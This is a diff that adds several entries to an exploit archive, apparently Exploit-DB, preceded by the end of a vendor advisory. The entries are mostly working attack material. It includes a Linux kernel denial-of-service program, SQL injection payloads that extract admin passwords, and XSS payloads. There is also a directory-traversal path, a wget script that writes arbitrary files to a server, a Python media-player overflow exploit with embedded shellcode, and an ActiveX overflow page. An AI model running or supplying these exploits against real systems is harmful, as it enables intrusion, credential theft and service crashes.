+      Date[Mi., 28 Mai 2014 17:45:39 GMT]
+
+
+-
+
+19:32:10.623[147ms][total 147ms] Status: 200[OK] 
+GET http://localhost:8080/pentest.png.js.html.php.aspx.js.png Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[0]
+      Date[Mi., 28 Mai 2014 17:45:39 GMT]
+
+
+-
+19:32:11.222[142ms][total 142ms] Status: 200[OK] GET http://localhost:8080/files/pentest.png.js.html.php
+
+
+Reference(s):
+http://localhost:8080/files/
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The file include web vulnerability can be patched by a secure encode and validation of the filename value itself. Parse also the output filename listing in the index module 
+to prevent further local file/path include attacks.
+
+1.2
+Restrict the filename value input by disallow of special chars. Only allow letters and numbers. Proof for multiple file extensions and block/replace them.
+use a secure exception-handling or filter mechanism to prevent further arbitrary file upload attacks.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability in the filename value is estimated as high.
+
+1.2
+The security risk of the arbitrary file upload web vulnerability in the wifi web-server ui is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/linux/dos/33635.c b/platforms/linux/dos/33635.c
new file mode 100755
index 000000000..e752233ab
--- /dev/null
+++ b/platforms/linux/dos/33635.c
@@ -0,0 +1,155 @@
+source: http://www.securityfocus.com/bid/38185/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
+
+/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
+
+/*****************************************************************************
+ * Copyright (C) 2008  Remi Denis-Courmont.  All rights reserved.            *
+ *                                                                           *
+ * Redistribution and use in source and binary forms, with or without        *
+ * modification, are permitted provided that the above copyright notice is   *
+ * retained and/or reproduced in the documentation provided with the         *
+ * distribution.                                                             *
+ *                                                                           *
+ * To the extent permitted by law, this software is provided  with no        *
+ * express or implied warranties of any kind.                                *
+ * The situation as regards scientific and technical know-how at the time    *
+ * when this software was distributed did not enable all possible uses to be *
+ * tested and verified, nor for the presence of any or all faults to be      *
+ * detected. In this respect, people's attention is drawn to the risks       *
+ * associated with loading, using, modifying and/or developing and           *
+ * reproducing this software.                                                *
+ * The user shall be responsible for verifying, by any or all means, the     *
+ * software's suitability for its requirements, its due and proper           *
+ * functioning, and for ensuring that it shall not cause damage to either    *
+ * persons or property.                                                      *
+ *                                                                           *
+ * The author does not warrant that this software does not infringe any or   *
+ * all intellectual right relating to a patent, a design or a trademark.     *
+ * Moreover, the author shall not hold someone harmless against any or all   *
+ * proceedings for infringement that may be instituted in respect of the     *
+ * use, modification and redistrbution of this software.                     *
+ *****************************************************************************/
+
+#define _GNU_SOURCE 1
+
+#include <stdio.h>
+#include <string.h>
+#include <stdarg.h>
+#include <stdlib.h>
+#include <stdint.h>
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <linux/if.h>
+#include <linux/if_tun.h>
+#include <pthread.h>
+
+static void run (const char *fmt, ...)
+{
+	va_list ap;
+	char *cmd;
+
+	va_start (ap, fmt);
+	vasprintf (&cmd, fmt, ap);
+	va_end (ap);
+
+	system (cmd);
+	free (cmd);
+}
+
+static int tun_open (void)
+{
+	struct ifreq req;
+
+	int fd = open ("/dev/net/tun", O_RDWR);
+	if (fd == -1)
+		return -1;
+
+	memset (&req, 0, sizeof (req));
+	req.ifr_flags = IFF_TUN;
+	if (ioctl (fd, TUNSETIFF, &req))
+	{
+		(void) close (fd);
+		return -1;
+	}
+
+	run ("ip link set dev %s up", req.ifr_name);
+	run ("ip -6 address add fd34:5678:9abc:def0::1/64 dev %s",
+		req.ifr_name);
+	return fd;
+}
+
+static unsigned rcvd;
+static int tun;
+
+static void cleanup_fd (void *data)
+{
+	(void) close ((intptr_t)data);
+}
+
+static void *thread (void *data)
+{
+	unsigned n = (uintptr_t)data;
+	struct sockaddr_in6 dst;
+	uint16_t tunhead[2];
+
+        int fd = socket (PF_INET6, SOCK_DGRAM, 0);
+
+        pthread_cleanup_push (cleanup_fd, (void *)(intptr_t)fd);
+	memset (&dst, 0, sizeof (dst));
+	dst.sin6_family = AF_INET6;
+	dst.sin6_addr.s6_addr32[0] = htonl (0xfd345678);
+	dst.sin6_addr.s6_addr32[1] = htonl (0x9ABCDEF0);
+	dst.sin6_addr.s6_addr32[2] = htonl (0);
+	dst.sin6_port = htons (53);
+
+	__sync_fetch_and_and (&rcvd, 0);
+	for (;;)
+	{
+		dst.sin6_addr.s6_addr32[3] =
+			__sync_fetch_and_add (&rcvd, 1) % n;
+		sendto (fd, NULL, 0, 0,
+			(struct sockaddr *)&dst, sizeof (dst));
+		read (tun, tunhead, 4);
+	}
+	pthread_cleanup_pop (0);
+}
+
+
+int main (void)
+{
+	setvbuf (stdout, NULL, _IONBF, 0);
+
+	tun = tun_open ();
+	if (tun == -1)
+	{
+		perror ("Error");
+		return 1;
+	}
+
+	for (uintptr_t n = 1; n <= (1 << 20); n *= 2)
+	{
+		struct timespec ts = { 1, 0, };
+		pthread_t th;
+
+		printf ("%6ju: ", (uintmax_t)n);
+		pthread_create (&th, NULL, thread, (void *)n);
+		clock_nanosleep (CLOCK_MONOTONIC, 0, &ts, NULL);
+		pthread_cancel (th);
+		pthread_join (th, NULL);
+		__sync_synchronize ();
+		printf ("%12u\n", rcvd);
+	}
+
+	close (tun);
+	return 0;
+}
+
diff --git a/platforms/php/webapps/33626.txt b/platforms/php/webapps/33626.txt
new file mode 100755
index 000000000..541533ff3
--- /dev/null
+++ b/platforms/php/webapps/33626.txt
@@ -0,0 +1,204 @@
+# Exploit Title: PHPBTTracker+ 2.2 SQL Injection
+# Date: May 13th, 2014
+# Exploit Author: BackBox Team <info@backbox.org>
+# Vendor Homepage: http://phpbttrkplus.sourceforge.net/
+# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/
+# Version: PHPBTTracker+ 2.2
+# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0
+
+========================================================================
+
+Advisory: PHPBTTracker+ 2.2 SQL Injection
+Disclosure by: BackBox Team <info@backbox.org>
+Severity: High
+
+
+I. INTRODUCTION
+========================================================================
+
+SQL Injection through User-Agent.
+
+User agent is an HTTP header section provided by application used by the 
+original client. This is used for statistical purposes and the protocol 
+violation tracing. The first white space delimited word must include the 
+product name with an optional slash and version number.
+
+User agent injection is a critical issue for web applications. In this 
+specific case it’s worthed to do an investigation on the header section 
+of user-agent to see if there is any malformation that will allow an SQLi.
+
+Example:
+  GET /tracker.php
+  User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa
+  Host: [host]
+  Accept: */*
+  Accept-Encoding: gzip;q=1.0, deflate, identity
+
+
+II. BACKGROUND
+========================================================================
+BitTorrent tracker protocol is used by clients to request the IP 
+addresses of other peers associated with a torrent, and to exchange the 
+client's transfer statistics. Clients connect to a centralized server, 
+known as a *tracker*, which stores their IP addresses and responds with 
+the IP addresses of other clients (also known as *peers*). The tracker 
+has no knowledge about the association of the nodes and their pieces 
+(it functions only as bridge between clients).
+
+The standard tracker protocol is based on HTTP, with request data 
+encoded as query parameters (as used by HTML forms) and response data 
+BEncoded.
+
+Query parameters must be encoded according to the rules for HTML form 
+submissions through HTTP GET: 'reserved character' bytes are encoded in 
+hexadecimal as %HH, and space is encoded as "+"; names and values are 
+joined with "=" and the pairs joined with "&". 
+
+The tracker's URL announce is obtained from the announce entry of the 
+root dictionary of the torrent metadata file.
+
+Clients announce themselves by sending a GET request to the tracker's 
+URL announce with "?" and the following parameters (encoded as above) 
+appended:
+
+info_hash 
+    The 20 byte sha1 hash of the bencoded form of the info value from
+    the metainfo file. Note that this is a substring of the metainfo 
+    file. Don't forget to URL-encode this. 
+
+peer_id 
+    A string of length 20 which the downloader uses as its id. Each 
+    downloader generates its own id at random at the start of a new 
+    download. Don't forget to URL-encode this. 
+
+port 
+    Port number that the peer is listening on. Common behavior is for a 
+    downloader to try to listen on port 6881 and if that port is taken 
+    try 6882, then 6883, etc. and give up after 6889. 
+
+uploaded 
+    Total amount uploaded so far, represented in base ten in ASCII. 
+
+downloaded 
+    Total amount downloaded so far, represented in base ten in ASCII. 
+
+left 
+    Number of bytes that a specific client still has to download, 
+    represented in base ten in ASCII. Note that this can't be computed 
+    from downloaded and the file length since the client might be 
+    resuming an earlier download, and there is a chance that some of 
+    the downloaded data failed an integrity check and had to be 
+    re-downloaded. 
+
+event 
+    Optional key which maps to started, completed, or stopped (or empty, 
+    which is the same as not being present). If not present, this is one 
+    of the announcements done at regular intervals. An announcement 
+    using started is sent when a download first begins, and one using 
+    completed is sent when the download is complete. No completed is 
+    sent if the file was complete when started. Downloaders should send 
+    an announcement using 'stopped' when they cease downloading, 
+    if they can. 
+
+Example:
+  http://hostname/announce
+  ?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4
+  &peer_id=
+  &port=51413
+  &uploaded=0
+  &downloaded=0
+  &left=0
+  &event=started
+
+
+III. DESCRIPTION
+========================================================================
+
+In order to exploit the vulnerability the torrent has to be managed by 
+the tracker. First we need to extract the GET request, and parse out the
+parameter "info_hash", a proxy or a traffic sniffer like Wireshark can 
+help us to do that.
+
+Example:
+
+  GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1
+  User-Agent: Transmission/2.51
+  Host: hostname
+  Accept: */*
+  Accept-Encoding: gzip;q=1.0, deflate, identity
+
+Then it's possible to inject SQL commands inside the User-Agent field.
+
+
+IV. PROOF OF CONCEPT
+========================================================================
+Is it possible to verify the vulnerability by using, for example, 
+sqlmap or curl...
+
+* Using SQLMap
+
+  raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent
+  
+  [...]
+
+  User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
+  sqlmap identified the following injection points with a total of 318 HTTP(s) requests:
+  ---
+  Place: User-Agent
+  Parameter: User-Agent
+      Type: boolean-based blind
+      Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
+      Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW
+  ---
+
+* Using curl
+
+  raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'
+
+  [...]
+
+  d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e
+
+
+V. BUSINESS IMPACT
+========================================================================
+An attacker could execute arbitrary SQL queries on the vulnerable 
+system. This may compromise the integrity of  database and/or expose 
+sensitive information.
+
+
+VI. SYSTEMS AFFECTED
+========================================================================
+PHPBTTracker+ Version 2.2 is vulnerable (probably v2.x and 
+RivetTracker v1.x too)
+
+Software Link: http://phpbttrkplus.sourceforge.net/
+Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0
+
+
+VII. REFERENCES
+========================================================================
+https://wiki.theory.org/BitTorrent_Tracker_Protocol
+http://resources.infosecinstitute.com/sql-injection-http-headers
+
+
+VIII. CREDITS
+========================================================================
+The vulnerability has been discovered by BackBox Linux Team
+http://www.backbox.org
+
+
+IX. VULNERABILITY HISTORY
+========================================================================
+May 13th, 2014: Vulnerability identification
+May ??th, 2014: Vendor notification
+May ??th, 2014: Vulnerability disclosure
+
+
+X. LEGAL NOTICES
+========================================================================
+The information contained within this advisory is supplied "as-is" with 
+no warranties or guarantees of fitness of use or otherwise. We accept no
+responsibility for any damage caused by the use or misuse
+of this information.
+
diff --git a/platforms/php/webapps/33634.txt b/platforms/php/webapps/33634.txt
new file mode 100755
index 000000000..a175de857
--- /dev/null
+++ b/platforms/php/webapps/33634.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38184/info
+
+CommodityRentals CD Rental Software is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0Ã?3a,admin_password),3,4+from+rental_adminâ?? 
\ No newline at end of file
diff --git a/platforms/php/webapps/33636.sh b/platforms/php/webapps/33636.sh
new file mode 100755
index 000000000..8f621bcec
--- /dev/null
+++ b/platforms/php/webapps/33636.sh
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/38186/info
+
+Interspire Knowledge Manager is prone to a vulnerability that allows attackers to create arbitrary files on a vulnerable computer.
+
+An attacker may exploit this issue to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
+
+Knowledge Manager 5.1.3 is vulnerable; other versions may also be affected. 
+
+# #!/bin/sh
+# echo "$0 <target_url> <relative_path_from_admin_dir> <file_name>
+<content_url>
+# example: $0 http://target.com/knowledge_base ../../../ file.php
+http://source
+# if kb is installed at knowledge_base, then the file: file.php will be
+# created in the base application directory from the content at
+http://source
+# "
+# sessionUrl=$1'/admin/de/dialog/file_manager.php'
+# uploadUrl=$1'/admin/de/dialog/callback.snipshot.php'
+# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies
+"$sessionUrl?userdocroot=$2&imgDir=&obj=1"
+# echo "session created, setting file name $2$3"
+# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies
+"$uploadUrl?action=step1&source_image=name&save_file_as=$3"
+# echo "upload content from: $4 ..."
+# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies
+"$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"
+# echo "file created test access to the script at: $1/admin/de/dialog/$2$3"; 
\ No newline at end of file
diff --git a/platforms/php/webapps/33637.txt b/platforms/php/webapps/33637.txt
new file mode 100755
index 000000000..222b7d765
--- /dev/null
+++ b/platforms/php/webapps/33637.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38204/info
+
+The Joomla! Webee component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+
+The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected by the SQL-injection issue and possibly the HTML-injection issues as well.
+
+http://www.example.com/index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
\ No newline at end of file
diff --git a/platforms/php/webapps/33638.txt b/platforms/php/webapps/33638.txt
new file mode 100755
index 000000000..624d961c8
--- /dev/null
+++ b/platforms/php/webapps/33638.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38204/info
+ 
+The Joomla! Webee component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+ 
+The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected by the SQL-injection issue and possibly the HTML-injection issues as well.
+ 
+[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
+[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
+[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url] 
\ No newline at end of file
diff --git a/platforms/php/webapps/33639.txt b/platforms/php/webapps/33639.txt
new file mode 100755
index 000000000..a6b12a8e8
--- /dev/null
+++ b/platforms/php/webapps/33639.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/38209/info
+
+Joomla! EasyBook component is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+EasyBook 2.0.0rc4 is vulnerable; other versions may also be affected. 
+
+
+The following example input is available:
+
+[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
+foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;
+' onclick="alert('XSS')"
+" onclick="alert('xss')"
+
diff --git a/platforms/php/webapps/33641.txt b/platforms/php/webapps/33641.txt
new file mode 100755
index 000000000..3cd406a39
--- /dev/null
+++ b/platforms/php/webapps/33641.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38220/info
+
+The Joomla! F!BB component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+
+The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+F!BB 1.96 is vulnerable; other versions may also be affected. 
+
+The following proof-of-concept URI and data are available:
+
+http://www.example.com/index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- 
\ No newline at end of file
diff --git a/platforms/php/webapps/33643.txt b/platforms/php/webapps/33643.txt
new file mode 100755
index 000000000..b8cef0177
--- /dev/null
+++ b/platforms/php/webapps/33643.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38234/info
+
+CMS Made Simple is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+CMS Made Simple 1.6.6 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
+http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39 
\ No newline at end of file
diff --git a/platforms/windows/dos/33640.py b/platforms/windows/dos/33640.py
new file mode 100755
index 000000000..b213a7e7b
--- /dev/null
+++ b/platforms/windows/dos/33640.py
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/38215/info
+
+AIMP is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+AIMP 2.51 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+#
+# AIMP2 (aimp2c.exe) m3u malformed open file stack overflow exploit
+# Coded by :  Molotov
+#
+# Greats To : Corelanc0d3r & exploit-db
+#
+# thanks to : Simo36 & all friends
+#
+shellcode = (
+"PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
+"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
+"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
+"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX"
+"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7"
+"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP"
+"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4"
+"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K"
+"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM"
+"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU"
+"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
+"QQ2LRCM0LJA"
+)
+header = "[playlist]\nNumberOfEntries=3\n\n"
+header += ("File1=");
+crash = 'A' * 2222
+crash+= shellcode
+crash+= 'B' * (4014-len(shellcode)-2222)
+crash+= '\x41\x6d'
+crash+= '\x0e\x45'
+align = '\x58\x6d'
+align+= '\x58\x6d'
+align+= '\x58\x6d'
+align+= '\x58\x6d'
+align+= '\x05\x01\x11\x6d'
+align+= '\x2d\x0F\x11\x6d'
+align+= '\x50\x6d\xC3'
+padd  = 'D' * 3000
+ 
+padd= 'D'*3000#n7Cn
+buffer = header + crash +align+padd +'\n'
+file=open('ss.m3u','w')
+file.write(buffer)
+file.close()
+print "[+] ss.m3u file created successfully"
diff --git a/platforms/windows/remote/20815.pl b/platforms/windows/remote/20815.pl
index 8ae253a40..29ed64647 100755
--- a/platforms/windows/remote/20815.pl
+++ b/platforms/windows/remote/20815.pl
@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/2674/info
+#source: http://www.securityfocus.com/bid/2674/info
 
-Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
+#Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
 
-* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 
+#* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 
 
 #!/usr/bin/perl
 # Exploit By storm@stormdev.net
diff --git a/platforms/windows/remote/33642.html b/platforms/windows/remote/33642.html
new file mode 100755
index 000000000..606803a24
--- /dev/null
+++ b/platforms/windows/remote/33642.html
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38222/info
+
+The Symantec Client Proxy ActiveX control is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
+
+The following are vulnerable:
+
+Symantec AntiVirus 10.0.x and 10.1.x prior to 10.1 MR9
+Symantec AntiVirus 10.2.x prior to 10.2 MR4
+Symantec Client Security 3.0.x and 3.1.x prior to 3.1 MR9 
+
+<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'> arg1=String(7188, "A") target.SetRemoteComputerName arg1 </script> </html> 
\ No newline at end of file